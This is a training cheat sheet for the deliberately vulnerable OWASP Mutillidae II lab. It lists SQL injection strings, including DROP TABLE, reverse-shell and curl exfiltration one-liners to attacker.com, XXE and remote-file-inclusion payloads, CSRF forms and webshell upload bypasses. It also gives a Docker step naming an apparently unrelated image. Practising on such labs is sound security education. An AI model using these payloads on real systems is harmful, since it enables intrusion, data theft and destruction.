OWASP Mutillidae II

OWASP Mutillidae II is a free, open-source vulnerable web application written in PHP that teaches web application security through hands-on challenges covering OWASP Top 10 vulnerabilities, SQL injection, XSS, authentication bypass, and more.

Installation

Docker Installation

# Pull Mutillidae image
docker pull webgoat/goatandwolf

# Run container
docker run -d -p 8080:80 --name mutillidae webgoat/goatandwolf

# Access at http://localhost:8080/mutillidae/

Manual Installation (Linux/Windows)

# Download latest version
# https://sourceforge.net/projects/mutillidae/

# Extract to web root
# Windows: C:\xampp\htdocs\mutillidae
# Linux: /var/www/html/mutillidae

# Set file permissions
chmod -R 755 /var/www/html/mutillidae

# Create database
# Use phpMyAdmin or command line

# Access application
# http://localhost/mutillidae/

Install on XAMPP/WAMP

# 1. Download XAMPP
# 2. Extract Mutillidae to htdocs folder
# 3. Create database via phpMyAdmin
# 4. Import mutillidae.sql
# 5. Access http://localhost/mutillidae/

# Home
# Login/Setup (first time setup)
# View Profile
# My Account
# Toggle Hints
# SQLi Injection challenges
# XSS vulnerabilities
# CSRF examples
# Authentication issues
# File upload exercises
# And many more...

Initial Setup

# Click "Setup/Reset DB" to initialize database
# Default credentials:
# Admin: admin / admin

# Create test accounts for variety of tests

OWASP Top 10 Vulnerability Coverage

A01 - SQL Injection

Exercise	Type	Difficulty
Login Form	Auth Bypass	Beginner
User-Agent	Blind SQLi	Intermediate
Add User	Union-based	Intermediate
Parameter Pollution	Multiple SQLi	Advanced

SQL Injection Examples

# 1. Authentication bypass
' OR '1'='1' --
admin' --
' OR 1=1 --

# 2. UNION-based SQLi
' UNION SELECT NULL,NULL,NULL --
' UNION SELECT table_name,column_name,3 FROM information_schema.columns --

# 3. Blind SQL injection
' AND SLEEP(5) --
' AND (SELECT * FROM (SELECT(SLEEP(5)))a) --

# 4. Time-based detection
' AND IF(1=1,SLEEP(5),0) --

# 5. Stacked queries
'; DROP TABLE users; --
'; UPDATE users SET role='admin'; --

# 6. Data exfiltration
' UNION SELECT GROUP_CONCAT(column_name),2,3 FROM information_schema.columns WHERE table_schema=database() --
' UNION SELECT GROUP_CONCAT(CONCAT(user_id,':',password)),2,3 FROM users --

A02 - Cryptographic Failures

Weak Cryptography Vulnerabilities

# 1. Plaintext storage
# Check for unencrypted passwords in database
# Look for passwords visible in HTML/JavaScript

# 2. Weak hashing
# MD5: echo -n 'password' | md5sum
# Test if hashes are reversible

# 3. Weak encryption keys
# Test if encryption uses hardcoded keys
# Common keys: password, secret, admin, default

# 4. HTTPS not enforced
# Check if sensitive operations use HTTP
# Look for mixed HTTP/HTTPS content

A03 - Injection

Command Injection

# 1. OS command execution
; whoami
| cat /etc/passwd
|| nc attacker.com 4444 -e /bin/sh

# 2. Reverse shell
; bash -i >& /dev/tcp/attacker.com/4444 0>&1

# 3. Command chaining
; ls -la /tmp
& whoami
&& id

# 4. Data exfiltration
; cat /etc/passwd > /tmp/output.txt
| curl http://attacker.com/exfil?data=$(cat /etc/passwd)

A05 - Broken Access Control

IDOR Exploitation

# 1. Enumerate user IDs
# http://localhost/mutillidae/?id=1
# http://localhost/mutillidae/?id=2
# http://localhost/mutillidae/?id=3

# 2. Access unauthorized content
# Modify user_id parameter
# Access profile of user_id=999

# 3. Admin function access
# Try: /admin?id=1
# Try: /user.php?id=admin
# Try: /profile?uid=0

Authorization Bypass

# 1. Direct URL access
# Try admin URLs directly
# /admin/panel
# /admin/users
# /admin/settings

# 2. Parameter manipulation
# role=admin
# is_admin=true
# privilege_level=99

# 3. Method override
# X-Original-URL header
# X-Rewrite-URL header

A07 - Identification and Authentication Failures

Weak Authentication

# 1. Default credentials
# admin / admin
# admin / password
# test / test

# 2. Brute force attack
# hydra -l admin -P wordlist.txt localhost http-post-form

# 3. Predictable session IDs
# Check session cookie values
# Look for patterns (sequential IDs)

# 4. Session fixation
# Set session ID manually
# Admin accepts it without verification

# 5. Weak password reset
# Predictable reset tokens
# User email as reset mechanism
# Bypass verification questions

A06 - Vulnerable and Outdated Components

Testing for Vulnerable Libraries

# 1. Check installed packages
# grep -r "version" wp-content/plugins/
# cat package.json | grep version

# 2. Identify outdated components
# npm audit
# composer audit

# 3. Test known vulnerabilities
# searchsploit application-name
# Use CVE databases for version info

Advanced Exercise Categories

XXE (XML External Entity) Injection

# 1. Basic XXE
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>

# 2. XXE with exfiltration
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
<!ENTITY % all "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker.com/?p=%xxe;'>">
%all;
]>
<foo>&exfiltrate;</foo>

# 3. Blind XXE
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/xxe.dtd">
%dtd;
]>

Cross-Site Request Forgery (CSRF)

# 1. Simple CSRF form
<form action="http://localhost/mutillidae/transfer.php" method="POST">
  <input type="hidden" name="amount" value="1000">
  <input type="hidden" name="to" value="attacker">
  <input type="submit">
</form>

# 2. Auto-submitting CSRF
<body onload="document.forms[0].submit()">

# 3. Image-based CSRF
<img src="http://localhost/mutillidae/transfer.php?amount=1000&to=attacker">

File Upload Vulnerabilities

# 1. Unrestricted file upload
# Upload .php shell

# 2. Bypass MIME type check
# Upload .php as .jpg
# Modify Content-Type header

# 3. Bypass extension filter
# shell.php5
# shell.phtml
# shell.php.jpg

# 4. Double extension
# shell.php.jpg (treated as PHP)

# 5. Null byte injection (older PHP)
# shell.php%00.jpg

Remote File Inclusion (RFI)

# 1. Basic RFI
# http://localhost/mutillidae/index.php?page=http://attacker.com/shell.php

# 2. Log file poisoning
# http://localhost/mutillidae/?page=../../var/log/apache2/access.log

# 3. With LFI wrapper
# http://localhost/mutillidae/?page=php://filter/convert.base64-encode/resource=../../index.php

Manual Testing Process

Reconnaissance

# 1. Map application
# Click all menus and links
# Note page parameters

# 2. Identify input fields
# Login forms
# Search boxes
# Upload fields
# Comments/feedback areas

# 3. Check source code
# View page source (Ctrl+U)
# Look for hardcoded values
# Check JavaScript for tokens

# 4. Examine HTTP traffic
# Use Burp Suite or DevTools
# Note all parameters
# Check headers for info disclosure

Vulnerability Testing

# 1. Test each input field
# XSS: <script>alert(1)</script>
# SQLi: ' OR '1'='1' --
# Command Injection: ; whoami

# 2. Test authentication
# SQL injection in login
# Default credentials
# Session manipulation

# 3. Test authorization
# Access admin functions
# Modify user roles
# Access other users' data

# 4. Test file handling
# Upload restricted types
# Traverse directories
# Access system files

Using Burp Suite

Intercepting Requests

# 1. Set proxy to localhost:8080
# 2. Start Burp Suite
# 3. Navigate Mutillidae
# 4. Capture requests in Proxy tab

# 5. Send to Repeater for testing
# 6. Modify parameters and resend

# 7. Use Intruder for:
# Brute force
# Parameter fuzzing
# Payload delivery

Scanner Features

# 1. Active scan
# Let Burp test for vulnerabilities
# Generate scan report

# 2. Passive scan
# Identify issues in traffic
# Check for configuration flaws

# 3. Issue details
# Each finding shows:
# - Description
# - Proof of concept
# - Remediation advice

Database Interaction

MySQL Commands

# 1. Connect to database
mysql -u root -p

# 2. View tables
USE mutillidae;
SHOW TABLES;

# 3. View user data
SELECT * FROM user;
SELECT username,password FROM user;

# 4. Modify data
UPDATE user SET role='admin' WHERE username='attacker';

# 5. Delete records
DELETE FROM user WHERE id=999;

# 6. View current queries
SELECT * FROM information_schema.processlist;

Exploitation Workflow

Step 1: Enumeration

# 1. List all users
# SQL: ' UNION SELECT username,password,3 FROM user --

# 2. Find available functions
# SQL: ' UNION SELECT GROUP_CONCAT(function_name),2,3 FROM information_schema.routines --

# 3. Check file permissions
# Check if files are writable
# Look for upload directories

Step 2: Exploitation

# 1. Execute payloads
# XSS to steal session
# SQLi to extract data
# Command injection for RCE

# 2. Establish persistence
# Create backdoor user
# Upload webshell
# Inject reverse shell

Step 3: Privilege Escalation

# 1. Use escalation vulnerabilities
# IDOR to access admin
# Bypass authentication
# Modify user roles in database

# 2. Gain system access
# RCE via command injection
# Read system files
# Create new admin account

Best Practices for Learning

Complete challenges in difficulty order
Read hints if completely stuck
Understand vulnerability root cause
Review remediation code
Practice multiple exploitation methods
Document findings
Teach others what you learn
Test in isolated environment
Never use skills maliciously

Challenge Tips and Tricks

Tip 1: Many fields are vulnerable to multiple attack types Tip 2: Check hints if you’re stuck, they’re valuable Tip 3: Database structure is visible through information_schema Tip 4: Upload functionality often has bypass techniques Tip 5: Session cookies can be modified with browser DevTools

Resources

Last updated: 2026-03-30